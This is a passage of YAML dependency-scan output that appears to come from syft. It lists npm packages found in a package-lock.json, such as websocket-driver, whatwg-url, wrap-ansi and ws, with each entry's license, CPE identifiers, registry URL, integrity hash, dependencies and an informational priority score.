source: syft-generated
- cpe: cpe:2.3:a:vite_compatible_readable_stream:vite_compatible_readable_stream:3.6.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:vite-compatible-readable:vite-compatible-readable-stream:3.6.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:vite-compatible-readable:vite_compatible_readable_stream:3.6.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:vite_compatible_readable:vite-compatible-readable-stream:3.6.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:vite_compatible_readable:vite_compatible_readable_stream:3.6.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:vite-compatible:vite-compatible-readable-stream:3.6.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:vite-compatible:vite_compatible_readable_stream:3.6.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:vite_compatible:vite-compatible-readable-stream:3.6.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:vite_compatible:vite_compatible_readable_stream:3.6.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:vite:vite-compatible-readable-stream:3.6.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:vite:vite_compatible_readable_stream:3.6.1:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/vite-compatible-readable-stream@3.6.1
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/vite-compatible-readable-stream/-/vite-compatible-readable-stream-3.6.1.tgz
integrity: sha512-t20zYkrSf868+j/p31cRIGN28Phrjm3nRSLR2fyc2tiWi4cZGVdv68yNlwnIINTkMTmPoMiSlc0OadaO7DXZaQ==
dependencies:
inherits: ^2.0.3
string_decoder: ^1.1.1
util-deprecate: ^1.0.1
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: c6d0b110f80cc969
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: webidl-conversions 3.0.1'
title: webidl-conversions 3.0.1
description: 'Package discovered: webidl-conversions 3.0.1'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 770e2f7ad3b1c524
name: webidl-conversions
version: 3.0.1
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: BSD-2-Clause
spdxExpression: BSD-2-Clause
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:webidl-conversions:webidl-conversions:3.0.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:webidl-conversions:webidl_conversions:3.0.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:webidl_conversions:webidl-conversions:3.0.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:webidl_conversions:webidl_conversions:3.0.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:webidl:webidl-conversions:3.0.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:webidl:webidl_conversions:3.0.1:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/webidl-conversions@3.0.1
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/webidl-conversions/-/webidl-conversions-3.0.1.tgz
integrity: sha512-2JAn3z8AR6rjK8Sm8orRC0h/bcl/DqL7tRPdGZ4I1CjdF+EaMLmYxBHyXuKL849eucPFhvBoxMsflfOb8kxaeQ==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: c76cb0d14c517e35
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: websocket-driver 0.7.4'
title: websocket-driver 0.7.4
description: 'Package discovered: websocket-driver 0.7.4'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 944bd0667b1458ca
name: websocket-driver
version: 0.7.4
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: Apache-2.0
spdxExpression: Apache-2.0
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:websocket-driver:websocket-driver:0.7.4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:websocket-driver:websocket_driver:0.7.4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:websocket_driver:websocket-driver:0.7.4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:websocket_driver:websocket_driver:0.7.4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:websocket:websocket-driver:0.7.4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:websocket:websocket_driver:0.7.4:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/websocket-driver@0.7.4
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/websocket-driver/-/websocket-driver-0.7.4.tgz
integrity: sha512-b17KeDIQVjvb0ssuSDF2cYXSg2iztliJ4B9WdsuB6J952qCPKmnVq4DyW5motImXHDC1cBT/1UezrJVsKw5zjg==
dependencies:
http-parser-js: '>=0.5.1'
safe-buffer: '>=5.1.0'
websocket-extensions: '>=0.1.1'
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: bb5b0fea2c384fe7
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: websocket-extensions 0.1.4'
title: websocket-extensions 0.1.4
description: 'Package discovered: websocket-extensions 0.1.4'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 6844e064384011a8
name: websocket-extensions
version: 0.1.4
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: Apache-2.0
spdxExpression: Apache-2.0
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:websocket-extensions_project:websocket-extensions:0.1.4:*:*:*:*:node.js:*:*
source: nvd-cpe-dictionary
purl: pkg:npm/websocket-extensions@0.1.4
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/websocket-extensions/-/websocket-extensions-0.1.4.tgz
integrity: sha512-OqedPIGOfsDlo31UNwYbCFMSaO9m9G/0faIHj5/dZFDMFqPTcx6UwqyOy3COEaEOg/9VsGIpdqn62W5KhoKSpg==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: c0ee8f2bbf5fd4e3
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: whatwg-url 5.0.0'
title: whatwg-url 5.0.0
description: 'Package discovered: whatwg-url 5.0.0'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 0827d54a7a5ea1e5
name: whatwg-url
version: 5.0.0
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:whatwg-url:whatwg-url:5.0.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:whatwg-url:whatwg_url:5.0.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:whatwg_url:whatwg-url:5.0.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:whatwg_url:whatwg_url:5.0.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:whatwg:whatwg-url:5.0.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:whatwg:whatwg_url:5.0.0:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/whatwg-url@5.0.0
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/whatwg-url/-/whatwg-url-5.0.0.tgz
integrity: sha512-saE57nupxk6v3HY35+jzBwYa0rKSy0XR8JSxZPwgLr7ys0IBzhGviA1/TUGJLmSVqs8pb9AnvICXEuOHLprYTw==
dependencies:
tr46: ~0.0.3
webidl-conversions: ^3.0.0
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 10cad46c067a700f
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: which 2.0.2'
title: which 2.0.2
description: 'Package discovered: which 2.0.2'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 414763db2a64d1aa
name: which
version: 2.0.2
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: ISC
spdxExpression: ISC
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:which:which:2.0.2:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/which@2.0.2
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/which/-/which-2.0.2.tgz
integrity: sha512-BLI3Tl1TW3Pvl70l3yq3Y64i+awpwXqsGBYWkkqMtnbXgrMD+yj7rhW0kuEDxzJaYXGjEW5ogapKNMEKNMjibA==
dependencies:
isexe: ^2.0.0
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 20ac7377e7b68a5f
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: which-module 2.0.1'
title: which-module 2.0.1
description: 'Package discovered: which-module 2.0.1'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: e9c9cc83bf436fd2
name: which-module
version: 2.0.1
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: ISC
spdxExpression: ISC
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:which-module:which-module:2.0.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:which-module:which_module:2.0.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:which_module:which-module:2.0.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:which_module:which_module:2.0.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:which:which-module:2.0.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:which:which_module:2.0.1:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/which-module@2.0.1
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/which-module/-/which-module-2.0.1.tgz
integrity: sha512-iBdZ57RDvnOR9AGBhML2vFZf7h8vmBjhoaZqODJBFWHVtKkDmKuHai3cx5PgVMrX5YDNp27AofYbAwctSS+vhQ==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 9ffab25d563bb6a3
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: wrap-ansi 6.2.0'
title: wrap-ansi 6.2.0
description: 'Package discovered: wrap-ansi 6.2.0'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 1fadca0371d5cfaf
name: wrap-ansi
version: 6.2.0
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:wrap-ansi:wrap-ansi:6.2.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:wrap-ansi:wrap_ansi:6.2.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:wrap_ansi:wrap-ansi:6.2.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:wrap_ansi:wrap_ansi:6.2.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:wrap:wrap-ansi:6.2.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:wrap:wrap_ansi:6.2.0:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/wrap-ansi@6.2.0
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/wrap-ansi/-/wrap-ansi-6.2.0.tgz
integrity: sha512-r6lPcBGxZXlIcymEu7InxDMhdW0KDxpLgoFLcguasxCaJ/SOIZwINatK9KY/tf+ZrlywOKU0UDj3ATXUBfxJXA==
dependencies:
ansi-styles: ^4.0.0
string-width: ^4.1.0
strip-ansi: ^6.0.0
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: '8455272704618757'
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: wrap-ansi 7.0.0'
title: wrap-ansi 7.0.0
description: 'Package discovered: wrap-ansi 7.0.0'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 336621830c576ca4
name: wrap-ansi
version: 7.0.0
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:wrap-ansi:wrap-ansi:7.0.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:wrap-ansi:wrap_ansi:7.0.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:wrap_ansi:wrap-ansi:7.0.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:wrap_ansi:wrap_ansi:7.0.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:wrap:wrap-ansi:7.0.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:wrap:wrap_ansi:7.0.0:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/wrap-ansi@7.0.0
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/wrap-ansi/-/wrap-ansi-7.0.0.tgz
integrity: sha512-YVGIj2kamLSTxw6NsZjoBxfSwsn0ycdesmc4p+Q21c5zPuZ1pl+NfxVdxPtdHvmNVOQ6XSYG4AUtyt/Fi7D16Q==
dependencies:
ansi-styles: ^4.0.0
string-width: ^4.1.0
strip-ansi: ^6.0.0
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 686325d7e763de93
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: wrap-ansi 8.1.0'
title: wrap-ansi 8.1.0
description: 'Package discovered: wrap-ansi 8.1.0'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 49a7c54fcd626265
name: wrap-ansi
version: 8.1.0
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:wrap-ansi:wrap-ansi:8.1.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:wrap-ansi:wrap_ansi:8.1.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:wrap_ansi:wrap-ansi:8.1.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:wrap_ansi:wrap_ansi:8.1.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:wrap:wrap-ansi:8.1.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:wrap:wrap_ansi:8.1.0:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/wrap-ansi@8.1.0
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/wrap-ansi/-/wrap-ansi-8.1.0.tgz
integrity: sha512-si7QWI6zUMq56bESFvagtmzMdGOtoxfR+Sez11Mobfc7tm+VkUckk9bW2UeffTGVUbOksxmSw0AA2gs8g71NCQ==
dependencies:
ansi-styles: ^6.1.0
string-width: ^5.0.1
strip-ansi: ^7.0.1
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 20b8ef0a2e52c375
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: wrappy 1.0.2'
title: wrappy 1.0.2
description: 'Package discovered: wrappy 1.0.2'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 3d054461229ae629
name: wrappy
version: 1.0.2
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: ISC
spdxExpression: ISC
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:wrappy:wrappy:1.0.2:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/wrappy@1.0.2
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/wrappy/-/wrappy-1.0.2.tgz
integrity: sha512-l4Sp/DRseor9wL6EvV2+TuQn63dMkPjZ/sp9XkghTEbV9KlPS1xUsZ3u7/IQO4wxtcFB4bgpQPRcR3QCvezPcQ==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: d249fddb72dddcbc
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: ws 8.18.3'
title: ws 8.18.3
description: 'Package discovered: ws 8.18.3'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 20d4f853542f41c9
name: ws
version: 8.18.3
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:ws_project:ws:8.18.3:*:*:*:*:node.js:*:*
source: nvd-cpe-dictionary
purl: pkg:npm/ws@8.18.3
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/ws/-/ws-8.18.3.tgz
integrity: sha512-PEIGCY5tSlUt50cqyMXfCzX+oOPqN0vuGqWzbcJ2xvnkzkq46oOpz7dQaTDBdfICb4N14+GARUDw2XV2N4tvzg==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: c71da5915aeb2537
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: xmlbuilder 13.0.2'
title: xmlbuilder 13.0.2
description: 'Package discovered: xmlbuilder 13.0.2'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 0872acd31442749a
name: xmlbuilder
version: 13.0.2
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:xmlbuilder:xmlbuilder:13.0.2:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/xmlbuilder@13.0.2
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/xmlbuilder/-/xmlbuilder-13.0.2.tgz
integrity: sha512-Eux0i2QdDYKbdbA6AM6xE4m6ZTZr4G4xF9kahI2ukSEMCzwce2eX9WlTI5J3s+NU7hpasFsr8hWIONae7LluAQ==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: fd4707cd0572bee3
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: xmlhttprequest-ssl 2.1.2'
title: xmlhttprequest-ssl 2.1.2
description: 'Package discovered: xmlhttprequest-ssl 2.1.2'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 9551f10f27f0ee2d
name: xmlhttprequest-ssl
version: 2.1.2
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:xmlhttprequest-ssl:xmlhttprequest-ssl:2.1.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:xmlhttprequest-ssl:xmlhttprequest_ssl:2.1.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:xmlhttprequest_ssl:xmlhttprequest-ssl:2.1.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:xmlhttprequest_ssl:xmlhttprequest_ssl:2.1.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:xmlhttprequest:xmlhttprequest-ssl:2.1.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:xmlhttprequest:xmlhttprequest_ssl:2.1.2:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/xmlhttprequest-ssl@2.1.2
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/xmlhttprequest-ssl/-/xmlhttprequest-ssl-2.1.2.tgz
integrity: sha512-TEU+nJVUUnA4CYJFLvK5X9AOeH4KvDvhIfm0vV1GaQRtchnG0hgK5p8hw/xjv8cunWYCsiPCSDzObPyhEwq3KQ==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: a5a624f94f45bfc0
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: xtend 4.0.2'
title: xtend 4.0.2
description: 'Package discovered: xtend 4.0.2'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 6f2d4b5e4aa5bc10
name: xtend
version: 4.0.2
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:xtend:xtend:4.0.2:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/xtend@4.0.2
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/xtend/-/xtend-4.0.2.tgz
integrity: sha512-LKYU1iAXJXUgAXn9URjiu+MWhyUXHsvfp7mcuYm9dSUKK0/CjtrUwFAxD82/mCWbtLsGjFIad0wIsod4zrTAEQ==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 5d318a2cd2d1309b
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: y18n 4.0.3'
title: y18n 4.0.3
description: 'Package discovered: y18n 4.0.3'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: f92fb588898c98cc
name: y18n
version: 4.0.3
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: ISC
spdxExpression: ISC
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:y18n_project:y18n:4.0.3:*:*:*:*:node.js:*:*
source: nvd-cpe-dictionary
purl: pkg:npm/y18n@4.0.3
metadataType: javascript-npm-package-lock-entry
